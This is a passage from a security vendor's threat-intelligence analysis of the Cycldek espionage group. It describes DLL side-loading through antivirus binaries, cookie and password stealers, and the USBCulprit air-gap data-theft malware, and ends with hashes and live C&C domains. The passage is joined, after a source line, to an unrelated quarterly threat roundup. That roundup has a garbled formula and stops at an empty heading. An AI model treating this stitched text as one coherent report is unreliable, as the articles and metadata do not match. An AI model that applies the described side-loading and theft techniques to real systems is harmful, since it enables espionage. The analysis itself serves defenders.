All of the discovered domains were used to download further samples.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png>)\n\n**__Figure 4_: Difference in URL scheme used by each implant for C2 communication._**\n\nThe conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&Cs, are outlined in the figures below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png>)\n\n_**_Figure 5_: Volume of downloaded samples from C&Cs of each cluster by country and month, since mid-2018.** _\n\nFurthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated to a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both groups. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix. 
All in all, this suggests the entities operating behind those clusters are sharing multiple resources \u2013 both code and infrastructure \u2013 and operating under a single organizational umbrella.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png>)\n\n_**_Figure 6_: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix.** _\n\n## Info stealing and lateral movement toolset\n\nDuring the analysis, we were able to observe a variety of tools downloaded from both BlueCore and RedCore implants used for either lateral movement in the compromised networks or information stealing from infected nodes. There were several types of these tools \u2013 some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized to complete specific tasks by the attackers.\n\nAs in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Updates (googleupdate.exe). These tools could be used in order to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.\n\nAs already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLbins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. 
Examples include BrowserHistoryView (a NirSoft utility to obtain browsing history from common browsers), ProcDump (a Sysinternals tool used to dump process memory, possibly to obtain passwords from running processes), Nbtscan (a command line utility intended to scan IP networks for NetBIOS information) and PsExec (a Sysinternals tool used to execute commands remotely in the network, typically used for lateral movement).

The rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:

 * **Custom HDoor:** an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the [Naikon APT](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf>), which made use of the original tool. The custom version used by Cycldek uses a small subset of the features, and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detection and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts that are accessible through the local network but not connected to the internet.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png>)

*Figure 7: Command line usage of the custom HDoor tool.*

 * **JsonCookies**: proprietary tool that steals cookies from the SQLite databases of Chromium-based browsers. For this purpose, the sqlite3.dll library is downloaded from the C&C and used during execution to parse the database and generate a JSON file named 'FuckCookies.txt' containing the stolen cookie info. Entries in the file resemble this one:

```
{
  "domain": ".google.com",
  "id": 1,
  "name": "NID",
  "path": "/",
  "value": "%VALUE%"
}
```

 * **ChromePass**: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png>)

*Figure 8: Command line usage of the ChromePass tool.*

## Formerly Unreported Malware: USBCulprit

One of the most notable examples in Cycldek's toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulprit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.

During the time the malware was active, it showed little change in functionality. Based on Kaspersky's telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated into samples detected after 2017 is the capability to execute files with a given name from a connected USB drive. This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.

Another change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.

This loading scheme demonstrates that the actor behind it makes use of similar TTPs to those seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive, named 'wrapper.exe' (originally named 'PtUserSessionWrapper.exe' and belonging to Trend Micro), forces the execution of a malicious DLL named 'TmDbgLog.dll'. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png>)

*Figure 9: USBCulprit's loading flow, as observed in samples after 2017.*

Once USBCulprit is loaded into memory and executed, it operates in three phases:

 * **Bootstrap and data collection:** this stage prepares the environment for the malware's execution. Namely, it invokes two functions named 'CUSB::RegHideFileExt' and 'CUSB::RegHideFile' that modify registry keys to hide the extensions of files in Windows and ensure that hidden files are not shown to the user.
It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware. Additionally, the malware makes a single scan to collect the files it intends to steal, using a function named 'CUSB::USBFindFile'. They are sought by enumerating several predefined directories to locate documents with one of the following extensions: *.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that lists all paths targeted for theft within a directory, such that every checked directory has a corresponding list file.

The chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a 'rar.exe' command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware's execution, and is set to 'abcd!@#$' for most variants that we observed.

It is worth noting that sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named 'time' within the directory from which the malware is executed. This file is expected to hold a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the 'time' file doesn't exist, it is created with the default value '20160601000000', corresponding to 01/06/2016 00:00:00.

 * **USB connection interception and data exfiltration/delivery**: when bootstrapping and data collection are completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. If at least one is of type DRIVE_REMOVABLE, further actions are taken.

When a USB drive is connected, the malware verifies whether stolen data should be exfiltrated to it or whether it already contains data that should be copied locally. To do this, a directory named '$Recyc1e.Bin' is searched for in the drive and, if not found, is created. This directory is used as the target path for copying files to the drive or as the source path for obtaining them from it.

To determine which direction of file copy should take place, a special marker file named '1.txt' is searched for locally. If it exists, the malware expects to find the aforementioned '$Recyc1e.Bin' directory on the drive, containing previously stolen document archives, and attempts to copy it to the local disk. Otherwise, the local archive files are copied from the disk to the same directory on the drive.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png>)

*Figure 10: USBCulprit's check for the 1.txt marker, indicating whether stolen files should be copied to the removable drive, or from it.*

 * **Lateral movement and extension**: as part of the same loop mentioned above, the existence of another marker file named '2.txt' is checked locally to decide whether lateral movement should be conducted. Only if this file exists is the malware's binary copied from its local path to the '$Recyc1e.Bin' directory. It's noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler. Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files on the USB drive and executing them. Examples of these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}. Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess, based on how they are handled, that they are used as extension modules or updated versions of the malware itself. The former is an archive that is extracted to a specific directory, whose files are then enumerated and executed using an internal function named 'CUSB::runlist', while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.

The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB drive and can help attackers profile whether the machine on which the malware was executed is indeed part of a segregated network.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png>)

*Figure 11: Commands used to profile the network connectivity of the compromised host.*

Another explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. This, along with the very specific files that the malware seeks as executable extensions, which could not be found as artifacts elsewhere in our investigation, points to a human factor being required to assist deployment of the malware in victim networks.

## Conclusion

Cycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.

Furthermore, our analysis of the implants affiliated to the group gives an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. It is also worth noting that we observed multiple instances where such entities didn't work in a well-coordinated manner, for example, infecting machines using the BlueCore implant when they were already infected with RedCore.

Lastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased – it has merely evolved and changed shape, in terms of malware and actors.
We continue to track the actor and report on its activity in our Threat Intelligence Portal.

For more information about Cycldek operations, contact us at: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)

### Appendix - IOCs

*Note*: a full list of IOCs can be found in our reports on the subject in Kaspersky's Threat Intelligence Portal.

**RedCore**:

A6C751D945CFE84C918E88DF04D85798 - wsc.dll (side-loaded DLL)  
4B785345161D288D1652C1B2D5CEADA1 - msgsm64.acm (encrypted shellcode and implant)

**BlueCore**:

1B19175C41B9A9881B23B4382CC5935F - QcLite.dll (side-loaded DLL)  
6D2E6A61EEDE06FA9D633CE151208831 - QcLite.dll (side-loaded DLL)  
6EA33305B5F0F703F569B9EBD6035BFD - QcLite.dll (side-loaded DLL)  
600E14E4B0035C6F0C6A344D87B6C27F - stdole.tlb (encrypted shellcode and implant)

**Lateral Movement and Info-Stealing Toolset:**

1640EE7A414DFF996AF8265E0947DE36 ChromePass  
1EA07468EBDFD3D9EEC59AC57A490701 ChromePass  
07EE1B99660C8CD5207E128F44AA8CBC JsonCookies  
809196A64CA4A32860D28760267A1A8B Custom HDoor  
81660985276CF9B6D979753B6E581D34 Custom HDoor  
A44804C2767DCCD4902AAE30C36E62C0 Custom HDoor

**USBCulprit:**

A9BCF983FE868A275F8D9D8F5DEFACF5 USBCulprit Loader  
C73B000313DCD2289F51B367F744DCD8 USBCulprit Loader  
2FB731903BD12FF61E6F778FDF9926EE USBCulprit Loader  
4A21F9B508DB19398AEE7FE4AE0AC380 USBCulprit Loader  
6BE1362D722BA4224979DE91A2CD6242 USBCulprit Loader  
7789055B0836A905D9AA68B1D4A50F09 USBCulprit Loader  
782FF651F34C87448E4503B5444B6164 USBCulprit Loader  
88CDD3CE6E5BAA49DC69DA664EDEE5C1 USBCulprit Loader  
A4AD564F8FE80E2EE52E643E449C487D USBCulprit Loader  
3CA7BD71B30007FC30717290BB437152 USBCulprit Payload  
58FE8DB0F7AE505346F6E4687D0AE233 USBCulprit Payload  
A02E2796E0BE9D84EE0D4B205673EC20 USBCulprit Payload  
D8DB9D6585D558BA2D28C33C6FC61874 USBCulprit Payload  
2E522CE8104C0693288C997604AE0096 USBCulprit Payload

**Toolset overlapping in both clusters:**

| Common Name | MD5 | Blue Cluster Domain | Red Cluster Domain | Description |
|---|---|---|---|---|
| chromepass.exe | 1EA07468EBDFD3D9EEC59AC57A490701 | http://login.vietnamfar.com:8080 | http://news.trungtamwtoa.com:88 | ChromePass |
| goopdate.dll | D8DB9D6585D558BA2D28C33C6FC61874 | http://cophieu.dcsvnqvmn.com:8080 | http://mychau.dongnain.com:443<br>http://hcm.vietbaonam.com:443 | USBCulprit |
| | 2E522CE8104C0693288C997604AE0096 | http://nghiencuu.onetotechnologys.com:8080<br>http://tinmoi.thoitietdulich.com:443<br>http://tinmoi.thoitietdulich.com:53 | http://tinmoi.vieclamthemde.com:53<br>http://tinmoi.vieclamthemde.com | USBCulprit |
| qclite.dll | 7FF0AF890B00DEACBF42B025DDEE8402 | http://web.hcmuafgh.com | http://tinmoi.vieclamthemde.com<br>http://tintuc.daikynguyen21.com | BlueCore Loading Hijacked DLL |
| silverlightmsi.dat | A44804C2767DCCD4902AAE30C36E62C0 | http://web.laovoanew.com:443<br>http://cdn.laokpl.com:8080 | http://login.dangquanwatch.com:53<br>http://info.coreders.com:8080 | Custom HDoor |

**C&Cs and Dropzones**:

http://web.laovoanew[.]com - Red Cluster

http://tinmoi.vieclamthemde[.]com - Red Cluster

http://kinhte.chototem[.]com - Red Cluster

http://news.trungtamwtoa[.]com - Red Cluster

http://mychau.dongnain[.]com - Red Cluster

http://hcm.vietbaonam[.]com - Red Cluster

http://login.thanhnienthegioi[.]com - Red Cluster

http://103.253.25.73 - Red Cluster

http://luan.conglyan[.]com - Red Cluster

http://toiyeuvn.dongaruou[.]com - Red Cluster

http://tintuc.daikynguyen21[.]com - Red Cluster

http://web.laomoodwin[.]com - Red Cluster

http://login.giaoxuchuson[.]com - Red Cluster

http://lat.conglyan[.]com - Red Cluster

http://thegioi.kinhtevanhoa[.]com - Red Cluster

http://laovoanew[.]com - Red Cluster

http://cdn.laokpl[.]com - Red Cluster

http://login.dangquanwatch[.]com - Blue Cluster

http://info.coreders[.]com - Blue Cluster

http://thanhnien.vietnannnet[.]com - Blue Cluster

http://login.diendanlichsu[.]com - Blue Cluster

http://login.vietnamfar[.]com - Blue Cluster

http://cophieu.dcsvnqvmn[.]com - Blue Cluster

http://nghiencuu.onetotechnologys[.]com - Blue Cluster

http://tinmoi.thoitietdulich[.]com - Blue Cluster

http://khinhte.chinhsech[.]com - Blue Cluster

http://images.webprogobest[.]com - Blue Cluster

http://web.hcmuafgh[.]com - Blue Cluster

http://news.cooodkord[.]com - Blue Cluster

http://24h.tinthethaoi[.]com - Blue Cluster

http://quocphong.ministop14[.]com - Blue Cluster

http://nhantai.xmeyeugh[.]com - Blue Cluster

http://thoitiet.yrindovn[.]com - Blue Cluster

http://hanghoa.trenduang[.]com - Blue Cluster

Source: Securelist, "Cycldek: Bridging the (air) gap", https://securelist.com/cycldek-bridging-the-air-gap/97157/ (published 2020-06-03).

Securelist blog post, last seen 2019-11-29. Related CVEs: CVE-2017-11882, CVE-2018-0802, CVE-2019-2725, CVE-2019-2729.

## Targeted attacks and malware campaigns

### Mobile espionage targeting the Middle East

At the end of June we reported the details of a highly targeted campaign that we dubbed 'Operation ViceLeaker', involving the spread of malicious Android samples via instant messaging. The campaign affected several dozen victims in Israel and Iran. We discovered this activity in May 2018, right after Israeli security agencies announced that Hamas had installed spyware on the smartphones of Israeli soldiers, and we released a private report on our [Threat Intelligence Portal](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>). We believe the malware has been in development since late 2016, but the main distribution began at the end of 2017.
The attackers used two methods to install these implants: they backdoored legitimate apps, injecting malicious Smali code; and they built a version of the legitimate open-source 'Conversations' messenger that included the malicious code. You can read more about Operation ViceLeaker [here](<https://securelist.com/fanning-the-flames-viceleaker-operation/90877/>).

### APT33 beefs up its toolset

In July, we published an update on the 2016-17 activities of [NewsBeef](<https://securelist.com/twas-the-night-before/91599/>) (aka APT33 and Charming Kitten), a threat actor that has focused on targets in Saudi Arabia and the West. NewsBeef lacks advanced offensive capabilities and has previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. In previous campaigns, this threat actor has relied heavily on the Browser Exploitation Framework (BeEF). However, in the summer of 2016, the group deployed a new toolset that included macro-enabled Office documents, PowerSploit, and the Pupy backdoor. The most recent campaign uses this toolset in conjunction with [spear-phishing](<https://encyclopedia.kaspersky.com/glossary/spear-phishing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) emails, links sent over social media and standalone private messaging applications, and [watering-hole](<https://encyclopedia.kaspersky.com/glossary/watering-hole/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) attacks that use compromised high-profile websites (some belonging to the Saudi government). The group has changed multiple characteristics year over year – tactics, the malicious JavaScript injection strategically placed on compromised websites, and command-and-control (C2) infrastructure. Subscribers to our [private intelligence reports](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>) receive unique and extraordinary data on significant activity and campaigns of more than 1009 APTs from across the world, including NewsBeef.

### New FinSpy iOS and Android implants found in the wild

We recently reported on the [latest versions of FinSpy for Android and iOS](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>). Governments and law enforcement agencies across the world use this surveillance software to collect personal data. FinSpy implants for iOS and Android have almost identical functionality: they are able to collect personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges by abusing known vulnerabilities. The iOS version doesn't provide infection exploits for its customers and so can only be installed on [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) devices – suggesting that physical access is required in order to install the implant. During our latest research we detected up-to-date versions of these implants in almost 20 countries, but we think the actual number of infections could be much higher.

### Turla revamps its toolset

Turla (aka Venomous Bear, Uroboros and Waterbug), a high-profile Russian-speaking threat actor with a known interest in cyber-espionage against government and diplomatic targets, has made significant changes to its toolset. Most notably, the group has wrapped its notorious JavaScript KopiLuwak malware in a new dropper called Topinambour, a new .NET file that is being used by Turla to distribute and drop its JavaScript KopiLuwak through infected installation packages for legitimate software programs such as VPNs for circumventing internet censorship. Named by the malware authors, Topinambour is an alternative name for the Jerusalem artichoke. Some of the changes the threat actor has made are intended to help it evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. Further, the malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. The two KopiLuwak analogues – the .NET RocketMan Trojan and the PowerShell MiamiBeach Trojan – are used for cyber-espionage. We think the threat actor deploys these versions when the computers of the targets are protected with security software capable of detecting KopiLuwak. All three implants are able to fingerprint targets, gather information on system and network adapters, steal files, and download and execute additional malware. MiamiBeach is also able to take screenshots. You can read more [here](<https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/>).

### CloudAtlas uses new infection chain

[Cloud Atlas](<https://securelist.com/recent-cloud-atlas-activity/92016/>) (aka Inception) has a long history of cyber-espionage operations targeting industries and government bodies. We first reported this group in 2014 and we have continued to track its activities. During the first half of this year, we identified campaigns focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts. Cloud Atlas hasn't changed its TTPs (Tactics, Techniques and Procedures) since 2018 and continues to rely on existing tactics and malware to compromise high-value targets. The threat actor's Windows intrusion set still uses spear-phishing emails to target its victims: these are crafted with Office documents that use malicious remote templates – whitelisted per victim – hosted on remote servers. Previously, Cloud Atlas dropped its 'validator' implant, named PowerShower, directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. In recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second-stage modular backdoor that we disclosed in 2014.

### Dtrack banking malware discovered

In summer 2018, we discovered ATMDtrack, a piece of banking malware targeting banks in India. We used YARA and the Kaspersky Attribution Engine to try to uncover more information about this ATM malware; and we found more than 180 new malware samples of a spy tool that we now call Dtrack. All the Dtrack samples we initially found were dropped samples, as the real payload was encrypted with various droppers – we were able to find them because of the unique sequences shared by ATMDtrack and the Dtrack [memory dumps](<https://encyclopedia.kaspersky.com/glossary/dump/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Once we decrypted the final payload and used the Kaspersky Attribution Engine again, we saw similarities with the [DarkSeoul campaign](<https://unit42.paloaltonetworks.com/tdrop2-attacks-suggest-dark-seoul-attackers-return/>), dating back to 2013 and attributed to the Lazarus group. It seems that they reused part of their old code to attack the financial sector and research centers in India.
Our telemetry indicates that the latest DTrack activity was detected in the beginning of September 2019. This is a good example of how proper YARA rules and a solid working attribution engine can help to uncover connections with established malware families. In this case, we were able to add another family to the Lazarus group's arsenal: ATMDtrack and Dtrack. You can find our public report on Dtrack [here](<https://securelist.com/my-name-is-dtrack/93338/>).\n\n## Other security news\n\n### Sodin ransomware attacks MSP\n\nIn April, the Sodin ransomware (aka Sodinokibi and REvil) caught our attention, not least, because of the way it spread. The Trojan [exploited the CVE-2019-2725 vulnerability](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) to execute a PowerShell command on a vulnerable Oracle WebLogic server, allowing the attackers to upload a dropper to the server, which then installed the ransomware payload. Patches for this vulnerability were released in April, but at the end of June, a similar vulnerability was discovered \u2013 CVE-2019-2729. Sodin also carried out [attacks on MSPs](<https://www.darkreading.com/attacks-breaches/attackers-exploit-msps-tools-to-distribute-ransomware/d/d-id/1335025>). In some cases, the attackers used the Webroot and Kaseya remote access consoles to deliver the Trojan. In others, [the attackers penetrated MSP infrastructure using an RDP connection](<https://www.reddit.com/r/msp/comments/c2wls0/kaseya_weaponized_to_deliver_sodinokibi_ransomware/>), elevated privileges, deactivated security solutions and backups and then downloaded the ransomware to client computers. This ransomware was also unusual because it didn't require the victim to carry out any action. Our statistics indicated that most victims were located in the Asia-Pacific region, including Taiwan, Hong Kong and South Korea.\n\nRansomware continues to be a major headache for consumers and businesses alike. 
Recovering data that a ransomware Trojan has encrypted is often impossible. However, in some cases we are able to do so. Recent examples include the [Yatron and FortuneCrypt malware](<https://securelist.com/ransomware-two-pieces-of-good-news/93355/>). If you ever face a situation where a ransomware Trojan has encrypted your data, and you don't have a backup, it's always worth checking the [No More Ransom](<https://www.nomoreransom.org/>) site, to see if a decryptor is available. You can find our decryptors for both of the above ransomware programs [here](<https://support.kaspersky.com/viruses/disinfection/10556>) and [here](<https://www.nomoreransom.org/en/decryption-tools.html>).\n\n### The impact of web mining\n\n[Malicious miners](<https://securelist.com/kaspersky-security-bulletin-2018-story-of-the-year-miners/89096/>) are programs designed to hijack the victim's CPU in order to mine crypto-currencies. The business model is simple: infect the computer, use the processing power of their [CPU](<https://en.wikipedia.org/wiki/Central_processing_unit>) or [GPU](<https://en.wikipedia.org/wiki/Graphics_processing_unit>) to generate coins and earn real-world money through legal exchanges and transactions. It's not obvious to the victim that they are infected \u2013 most people seldom use most of their computer's processing power and miners harness the 70-80% that is not being used for anything else. Miners can be installed along with adware, hacked games and other pirated content. However, there's also another model \u2013 using an embedded mining script that starts when the victim opens an infected web page. Where a corporate network has been infected, the CPU capacity available to the cybercriminals can be huge. But what impact does mining have? 
We recently tried to quantify the economic and environmental impact of web miners, and thereby evaluate the positive benefit of protecting against mining.

The total power saving can be calculated using the formula ·N, where is the average value of the increase in power consumption of the victim's device during the web mining process, and N is the number of blocked attempts according to KSN ([Kaspersky Security Network](<https://www.kaspersky.com/ksn>)) data for 2018. This figure is equal to 18.8±11.8 gigawatts (GW) – twice the average power consumption rate of all Bitcoin miners in the same year. To assess the amount of saved energy based on this power consumption rate, this number is multiplied by the average time that victim devices spend on web mining; that is, according to the formula '·N·t', where 't' is the average time that web miners would have been working had they not been blocked by our products. Since this value cannot be obtained from Kaspersky data, we used information from open sources provided by third-party researchers, according to which the estimated amount of electricity saved by users of our products ranges from 240 to 1,670 megawatt hours (MWh). Using the average prices for individual consumers, this amount of electricity could cost up to $200,000 for residents in North America or up to €250,000 for residents in Europe.

You can read our report [here](<https://securelist.com/electricity-and-mining/93292/>).

### Mac OS threat landscape

Some people still believe that there are no serious threats for Mac OS. There are certainly fewer threats than for Windows, mainly because more people run Windows, so there is a bigger pool of potential victims for attackers to target. However, as the number of people running Mac OS has grown, so has the number of threats targeting them.

Our database currently contains 206,759 unique malicious and potentially unwanted files for Mac OS.
From 2012 to 2017, the number of people facing attack grew year by year, reaching a peak in 2017, when we blocked attacks on around 255,000 computers running Mac OS. Since then there has been a drop, and in the first half of 2019 we blocked around 87,000 attacks. The majority of threats for Mac OS in 2019 fell into the adware category – these threats are easier to create, offering a better return on investment for cybercriminals.

The number of phishing attacks targeting Mac OS has also increased year by year. During the first half of 2019, we detected nearly 6 million phishing attacks, 11.8% of which targeted corporate users. The countries facing the most phishing attacks were Brazil (30.87%), India (22.08%) and France (22.02%). The number of phishing attacks seeking to exploit the Apple brand name has also grown in recent years – by around 30-40% each year. In 2018, there were nearly 1.5 million such attacks; and in the first half of 2019 alone, the number exceeded 1.6 million – already an increase of 9% over the previous year.

You can read our report on the current Mac OS threat landscape [here](<https://securelist.com/threats-to-macos-users/93116/>).

### Smart home vulnerabilities

One of our colleagues chose to turn his home into a smart home and installed a Fibaro Home Center system, so that he could remotely manage smart devices in the house, including lights, heating system, fridge, stereo system, sauna heater, smoke detectors, flood sensors, IP cameras and doorbell. He invited researchers from the [Kaspersky ICS CERT](<https://ics-cert.kaspersky.com/>) team to investigate it to see how secure it was. The researchers knew the model of the smart home hub and the IP address. They decided not to look at the Z-Wave protocol, which the smart home hub uses to talk to the appliances, because this required physical proximity to the house.
They also discarded the idea of exploiting the programming language interpreter – the Fibaro hub used the patched version.

Our researchers were able to find a remote SQL injection vulnerability, despite the efforts of Fibaro to avoid them, and a couple of remote code execution vulnerabilities in the PHP code. If exploited, these vulnerabilities would allow attackers to get root access rights on the smart hub, giving them full control over it. They also found a severe vulnerability in the Fibaro cloud that could allow an attacker to access all backups uploaded from Fibaro hubs around the world. This is how our research team acquired the backup data stored by the Fibaro Home Center located in this particular home. Among other things, this backup contains a database file with a lot of personal information, including the house's location, geo-location data from the owner's smartphone, the email address used to register with Fibaro, information about smart devices in the owner's home and even the owner's password. Credit to Fibaro Group not only for creating a rather secure product but also for working closely with our researchers to quickly patch the vulnerabilities we reported to them. You can read the full story [here](<https://securelist.com/fibaro-smart-home/91416/>).

### Security of smart buildings

This quarter we also looked at the [security of automation systems in buildings](<https://securelist.com/smart-buildings-threats/93322/>) – sensors and controllers to manage elevators, ventilation, heating, lighting, electricity, water supply, video surveillance, alarm systems, fire extinguishing systems and more in industrial facilities. Such systems are used not only in office and residential buildings but also in hospitals, shopping malls, prisons, industrial production, public transport and other places where large work and/or living areas need to be controlled.
We looked at the live threats to building-based automation systems to see what malware their owners encountered in the first six months of 2019.

Most of the blocked threats were neither targeted nor specific to building-based automation systems, but ordinary malware regularly found on corporate networks unrelated to automation systems. Such threats can still have a significant impact on the availability and integrity of automation systems, from file encryption (including databases) to denial of service on network equipment and workstations because of malicious traffic and unstable exploits. Spyware and backdoors pose a far greater threat, since stolen authentication data and the remote control it provides can be used to plan and carry out a subsequent targeted attack on a building's automation system.

### Smart cars and connected devices

Kaspersky has investigated smart car security several times in recent years ([here](<https://securelist.com/mobile-apps-and-stealing-a-connected-car/77576/>) and [here](<https://securelist.com/a-study-of-car-sharing-apps/86948/>)), revealing a number of security issues. As vehicles become smarter and more connected, they are also becoming more exposed. However, this doesn't just apply to smart cars and the apps that support them. There is now a whole industry of after-market devices designed to improve the driving experience – from car scanners to tuning gadgets. In a recent report, [we reviewed a number of automotive connected devices](<https://securelist.com/on-the-iot-road/91833/>) and examined their security setup. This exercise provided us with a first look at security issues in these devices. Our review included a couple of auto scanners, a dashboard camera, a GPS tracker, a smart alarm system and a pressure and temperature monitoring system.

We found the security of these devices more or less adequate, leaving aside minor issues.
This is partly due to the limited device functionality and a lack of serious consequences in the event of a successful attack. It's also due to the vigilance of vendors. However, as we move towards a more and more connected future, it's important to remember that the smarter an object is, the more attention should be paid to security in the development and updating of a device: careless development or an unpatched vulnerability could allow an attacker to hijack a victim's car or spy on an entire car fleet.

We continue to develop [KasperskyOS](<https://os.kaspersky.com/2019/05/20/kasperskyos-an-immune-based-approach-to-information-system-security/>), to help customers secure connected systems – including mobile devices and PCs, internet of things devices, intelligent energy systems, industrial systems, telecommunications systems and transportation systems.

If you're considering buying a device to make your car a little bit smarter, you should think about the security risks. Check to see if any vulnerabilities affect the device and whether it's possible to apply security updates to it. Don't automatically buy the most recently released product, since it might contain a security flaw that hasn't yet been discovered: the best choice is to buy a product that has already been updated several times. Finally, always consider the security of the 'mobile dimension' of the device, especially if you use an Android device: while applications make life easier, once a smartphone is hit by malware a lot can go wrong.

### Personal data theft

